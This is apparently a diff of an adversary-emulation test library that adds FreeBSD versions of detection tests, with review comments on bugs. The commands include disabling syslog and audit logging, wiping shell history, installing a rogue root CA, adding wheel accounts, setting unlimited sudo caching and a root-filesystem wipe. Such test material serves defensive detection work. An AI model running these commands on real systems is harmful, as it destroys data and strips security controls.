- name: Add and delete Packet Filter rules
|
||||
auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b
|
||||
description: "Add and delete a rule on the Packet Filter (PF) if installed and
|
||||
enabled. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pf is installed on the machine and enabled.
|
||||
|
||||
'
|
||||
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
|
||||
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
|
||||
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
|
||||
get_prereq_command: |
|
||||
echo "anchor pf-rules >> /etc/pf.conf"
|
||||
pfctl -f /etc/pf.conf
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
|
||||
pfctl -a pf-rules -s rules
|
||||
cleanup_command: |
|
||||
pfctl -a pf-rules -F rules
|
||||
sed -i "" '/anchor pf-rules/d'
|
||||
pfctl -f /etc/pf.conf
|
||||
- name: Edit UFW firewall user.rules file
|
||||
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
|
||||
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
|
||||
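Review bot: `echo "anchor pf-rules >> /etc/pf.conf"` in `get_prereq_command` has the redirection inside the quotes, so it prints the string to stdout and never adds the anchor to `/etc/pf.conf`; it should be `echo "anchor pf-rules" >> /etc/pf.conf`, ideally guarded with `grep -q '^anchor pf-rules' /etc/pf.conf ||` so repeated runs do not stack duplicate anchor lines. The matching `cleanup_command` line `sed -i "" '/anchor pf-rules/d'` is missing its file operand (`/etc/pf.conf`) and will block waiting on stdin instead of editing the file.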
@@ -7620,9 +8101,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -7655,9 +8135,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -8582,6 +9061,32 @@ defense-evasion:
|
||||
sudo rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify binary from C source (freebsd)
|
||||
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
|
||||
description: 'Make, change owner, and change file attributes on a C source code
|
||||
file
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1548.001/src/hello.c
|
||||
executor:
|
||||
command: |
|
||||
cp #{payload} /tmp/hello.c
|
||||
chown root /tmp/hello.c
|
||||
make /tmp/hello
|
||||
chown root /tmp/hello
|
||||
chmod u+s /tmp/hello
|
||||
/tmp/hello
|
||||
cleanup_command: |
|
||||
rm /tmp/hello
|
||||
rm /tmp/hello.c
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file
|
||||
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
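Review bot: "Make and modify binary from C source (freebsd)" has no `dependencies` block checking for `cc` and `make`, and `make /tmp/hello` with no Makefile leans on bmake's implicit `.c` single-suffix rule; a `prereq_command` of `command -v cc && command -v make` would make the failure mode explicit instead of a mid-test error. The trailing context also shows the existing Linux/macOS test "Set a SetUID flag on file" described as setting the flag "on a file in FreeBSD" while its SetGID sibling says "in Linux and macOS"; whichever commit introduced that wording, it should read Linux and macOS.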
@@ -8605,6 +9110,28 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetUID flag on file (freebsd)
|
||||
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
|
||||
description: 'This test sets the SetUID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod u+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file
|
||||
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
|
||||
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
||||
@@ -8628,6 +9155,28 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Set a SetGID flag on file (freebsd)
|
||||
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
|
||||
description: 'This test sets the SetGID flag on a file in FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
type: path
|
||||
default: "/tmp/evilBinary"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_setuid}
|
||||
chown root #{file_to_setuid}
|
||||
chmod g+xs #{file_to_setuid}
|
||||
cleanup_command: 'rm #{file_to_setuid}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Make and modify capabilities of a binary
|
||||
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
|
||||
description: |
|
||||
@@ -8681,7 +9230,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -8695,7 +9243,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -9555,6 +10102,27 @@ defense-evasion:
|
||||
sed -i '$ d' /etc/#{libaudit_config_file_name}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Auditing Configuration Changes on FreeBSD Host
|
||||
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
|
||||
description: 'Emulates modification of auditd configuration files
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
auditd_config_file_name:
|
||||
description: The name of the auditd configuration file to be changed
|
||||
type: string
|
||||
default: audit_event
|
||||
executor:
|
||||
command: 'echo ''#art_test_1562_006_1'' >> /etc/security/#{auditd_config_file_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i "" ''/#art_test_1562_006_1/d'' /etc/security/#{auditd_config_file_name}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Logging Configuration Changes on Linux Host
|
||||
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
|
||||
description: 'Emulates modification of syslog configuration.
|
||||
@@ -9598,6 +10166,29 @@ defense-evasion:
|
||||
fi
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Logging Configuration Changes on FreeBSD Host
|
||||
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
|
||||
description: 'Emulates modification of syslog configuration.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
syslog_config_file_name:
|
||||
description: The name of the syslog configuration file to be changed
|
||||
type: string
|
||||
default: syslog.conf
|
||||
executor:
|
||||
command: |
|
||||
if [ -f "/etc/#{syslog_config_file_name}" ];
|
||||
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
|
||||
fi
|
||||
cleanup_command: |
|
||||
if [ -f "/etc/#{syslog_config_file_name}" ];
|
||||
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
|
||||
fi
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1562.007:
|
||||
technique:
|
||||
modified: '2023-04-15T00:25:36.502Z'
|
||||
@@ -11401,6 +11992,23 @@ defense-evasion:
|
||||
export HISTCONTROL=ignoreboth
|
||||
#{evil_command}
|
||||
name: sh
|
||||
- name: Disable history collection (freebsd)
|
||||
auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306
|
||||
description: 'Disables history collection in shells
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
evil_command:
|
||||
description: Command to run after shell history collection is disabled
|
||||
type: string
|
||||
default: whoami
|
||||
executor:
|
||||
command: |
|
||||
export HISTSIZE=0
|
||||
#{evil_command}
|
||||
name: sh
|
||||
- name: Mac HISTCONTROL
|
||||
auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
|
||||
description: "The HISTCONTROL variable is set to ignore (not write to the history
|
||||
@@ -11481,6 +12089,25 @@ defense-evasion:
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTSIZE environment variable
|
||||
auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814
|
||||
description: |
|
||||
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo $HISTSIZE
|
||||
export HISTSIZE=0
|
||||
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; fi
|
||||
# -> $HISTSIZE is zero
|
||||
cleanup_command: 'export HISTSIZE=100
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
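Review bot: the new "Setting the HISTSIZE environment variable" test restores a hardcoded `export HISTSIZE=100` in `cleanup_command`, whereas the HISTCONTROL test in the context above restores the saved value with `export HISTCONTROL=$(echo $TEST)`; save the original (`TEST=$HISTSIZE`) and restore that instead. The description calls HISTSIZE the "history files size" variable, but in sh it is the number of commands kept, and the test name lacks the "(freebsd)" suffix its neighbours carry, so it cannot be told apart from the Linux version in a listing.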
@@ -11501,6 +12128,25 @@ defense-evasion:
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable (freebsd)
|
||||
auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=~/.sh_history
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
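Review bot: `if [ $(echo $HISTFILE) == "/dev/null" ]` in "Setting the HISTFILE environment variable (freebsd)" uses `==`, which is not a POSIX `test` operator; under `name: sh` write `[ "$HISTFILE" = "/dev/null" ]` (quoting also keeps `[` from failing when the variable is empty). The Linux version in the context above restores `$TEST`; the cleanup here should put back the saved value rather than assume `~/.sh_history` was the original.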
@@ -12614,6 +13260,22 @@ defense-evasion:
|
||||
cleanup_command: "#{cleanup_command}\n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable syslog (freebsd)
|
||||
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
|
||||
description: 'Disables syslog collection
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service syslogd stop
|
||||
sysrc syslogd_enable="NO"
|
||||
cleanup_command: |
|
||||
sysrc syslogd_enable="YES"
|
||||
service syslogd start
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Cb Response
|
||||
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
|
||||
description: 'Disable the Cb Response service
|
||||
@@ -12732,7 +13394,6 @@ defense-evasion:
|
||||
as an additional \npayload to the compromised host and to make sure that there
|
||||
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
|
||||
@@ -13398,6 +14059,37 @@ defense-evasion:
|
||||
/tmp/art.sh
|
||||
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
|
||||
name: sh
|
||||
- name: Decode base64 Data into Script
|
||||
auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c
|
||||
description: "Creates a base64-encoded data file and decodes it into an executable
|
||||
shell script\n\nUpon successful execution, sh will execute art.sh, which is
|
||||
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
|
||||
uname -v\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
shell_command:
|
||||
description: command to encode
|
||||
type: string
|
||||
default: echo Hello from the Atomic Red Team && uname -v
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'encode the command into base64 file
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh
|
||||
chmod +x /tmp/art.sh
|
||||
/tmp/art.sh
|
||||
cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n"
|
||||
name: sh
|
||||
T1556.006:
|
||||
technique:
|
||||
modified: '2023-02-09T14:18:59.080Z'
|
||||
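Review bot: the new test keeps the name "Decode base64 Data into Script", identical to the Linux test whose cleanup ends just above it, so the two are indistinguishable in any listing keyed on name; the rest of this diff uses a "(freebsd)" suffix and this test should too. `prereq_command: exit 1` forces `get_prereq_command` to re-encode on every run, which is deliberate but deserves a word in the dependency description so nobody "fixes" it.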
@@ -14047,7 +14739,6 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
@@ -14679,6 +15370,33 @@ defense-evasion:
|
||||
update-ca-trust
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Install root CA on FreeBSD
|
||||
auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3
|
||||
description: 'Creates a root CA with openssl
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
cert_filename:
|
||||
description: Path of the CA certificate we create
|
||||
type: path
|
||||
default: rootCA.crt
|
||||
key_filename:
|
||||
description: Key we create that is used to create the CA certificate
|
||||
type: path
|
||||
default: rootCA.key
|
||||
executor:
|
||||
command: |
|
||||
openssl genrsa -out #{key_filename} 4096
|
||||
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
|
||||
cp #{cert_filename} /usr/local/share/certs/
|
||||
certctl rehash
|
||||
cleanup_command: |
|
||||
rm /usr/local/share/certs/#{cert_filename}
|
||||
certctl rehash
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Install root CA on Debian/Ubuntu
|
||||
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
|
||||
description: 'Creates a root CA with openssl
|
||||
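Review bot: "Install root CA on FreeBSD" cleans up only `/usr/local/share/certs/#{cert_filename}`; the private key `#{key_filename}` (4096-bit RSA, no passphrase because of `-nodes`) and the original `#{cert_filename}` stay in the working directory after the test, and an unprotected key for a once-trusted CA is exactly the artefact this technique is about, so add `rm #{key_filename} #{cert_filename}` to `cleanup_command`. `certctl rehash` also needs a release that ships certctl(8); a `command -v certctl` prereq would turn the failure on older hosts into a skipped prerequisite instead of a half-installed certificate.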
@@ -14786,7 +15504,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14818,7 +15535,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14849,7 +15565,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16496,7 +17211,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16534,7 +17248,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -16590,6 +17303,20 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: Delete Filesystem - FreeBSD
|
||||
auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
|
||||
description: 'This test deletes the entire root filesystem of a FreeBSD system.
|
||||
This technique was used by Amnesia IoT malware to avoid analysis. This test
|
||||
is dangerous and destructive, do NOT use on production equipment.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
chflags -R 0 /
|
||||
rm -rf / > /dev/null 2> /dev/null
|
||||
name: sh
|
||||
T1158:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
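Review bot: "Delete Filesystem - FreeBSD" is tagged `supported_platforms: - linux` and has no `elevation_required: true`, although `chflags -R 0 /` and `rm -rf /` need root and the description says the test is destructive and must not touch production equipment. The platform tag is the only control that keeps a runner from scheduling this on the wrong host, so it needs to be `- freebsd` (or a `prereq_command` that checks `uname -s`), and the executor needs `elevation_required: true` so the framework flags the privilege it will use.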
@@ -17285,6 +18012,22 @@ defense-evasion:
|
||||
chmod +x 'testdirwithspaceend /init '
|
||||
'./testdirwithspaceend /init '
|
||||
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
|
||||
- name: Space After Filename (FreeBSD)
|
||||
auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
|
||||
description: 'Space after filename.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
|
||||
-p 'testdirwithspaceend '\n/bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend
|
||||
/init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename
|
||||
to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \"
|
||||
&& echo \"exit\" >> \"testdirwithspaceend /init \" \nchmod +x 'testdirwithspaceend
|
||||
/init '\n'./testdirwithspaceend /init '\n"
|
||||
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
|
||||
T1550.002:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:45.141Z'
|
||||
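Review bot: the "Space After Filename (FreeBSD)" executor pipes into `python3.9` with no `dependencies` block, so on a host without that exact interpreter version the masqueraded `init` script fails at runtime instead of being skipped as a missing prerequisite; add `prereq_command: command -v python3.9` or use whatever `python3` resolves to. The string the script prints also says "running T1035.006" while the test and its temp directory `/tmp/atomic-test-T1036.006` are T1036.006.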
@@ -17923,7 +18666,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -19039,6 +19781,23 @@ defense-evasion:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
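Review bot: in "Create local account (FreeBSD)" the password is applied with `pw mod user testuser1 -h 0`, but the account just created is `art`, so `art` is left without a password and `testuser1` (which may not exist) gets one; the operand should be `art`. The value piped in is the output of `openssl passwd -1`, an already-hashed string, while pw's `-h fd` reads a cleartext password and hashes it; use `-H 0` for a pre-hashed value, or pipe the plaintext `art` to `-h 0` the way the ssh test earlier in this diff does with `echo 'pwd101!' | pw mod user testuser1 -h 0`.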
@@ -19062,6 +19821,30 @@ defense-evasion:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
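Review bot: "Reactivate a locked/expired account (FreeBSD)" carries the same `pw mod user testuser1 -h 0` operand mix-up as the create-account test (the user is `art`) and the same hashed-value-into-`-h` problem (`-H 0` is the flag for a pre-hashed string). `pw usermod art -e +1d` sets the expiry one day in the future, so the account is not expired at the point where the description says the `su art` attempt should fail; an explicit past date (pw(8) accepts a UNIX time or `dd-mmm-yyyy`) is needed before `pw user mod art -e +99d` renews it. `pw usermod` and `pw user mod` are both valid spellings, but one form throughout reads better.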
@@ -19080,6 +19863,26 @@ defense-evasion:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
T1211:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
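Review bot: the description of "Login as nobody (freebsd)" says the password is changed to nobody, but the command sets it from `openssl passwd -1 art`, and again feeds a hash to `-h 0` where `-H 0` is the flag for pre-hashed values. The expected-output comments inside the same test disagree with each other: the executor shows `nobody:x:65534:...` while the cleanup shows `nobody:*:65534:...`; FreeBSD's /etc/passwd uses `*` in the password field, so the first comment should match the second.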
@@ -20427,6 +21230,27 @@ privilege-escalation:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
|
||||
- name: Sudo usage (freebsd)
|
||||
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
|
||||
description: 'Common Sudo enumeration methods.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
|
||||
- name: Unlimited sudo cache timeout
|
||||
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
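Review bot: `sudo ee /usr/local/etc/sudoers` in "Sudo usage (freebsd)" opens a full-screen interactive editor, which will hang a non-interactive executor until it is killed; `sudo -l` and `sudo cat /usr/local/etc/sudoers` already produce the enumeration telemetry, so drop the editor line or replace it with `sudo visudo -c -f /usr/local/etc/sudoers`, which is non-interactive and still reads sudoers through a privileged process.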
@@ -20443,6 +21267,31 @@ privilege-escalation:
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Unlimited sudo cache timeout (freebsd)
|
||||
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
This is dangerous to modify without using ''visudo'', do not do this on a
|
||||
production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching
|
||||
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
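Review bot: the executor line `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers` does not work with FreeBSD's sed, where `-i` takes a mandatory backup-extension argument: the script string is consumed as the extension and `/usr/local/etc/sudoers` is then parsed as the sed script, so the command errors out and the file is never modified, while the following `visudo -c -f` still reports the untouched file as valid and the test appears to pass. Use the zero-length extension form, `sed -i '' 's/...'`, as the "Malicious PAM rule (freebsd)" entry in this same patch already does.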
@@ -20458,6 +21307,30 @@ privilege-escalation:
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching (freebsd)
|
||||
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
to modify without using ''visudo'', do not do this on a production system.
|
||||
|
||||
'
|
||||
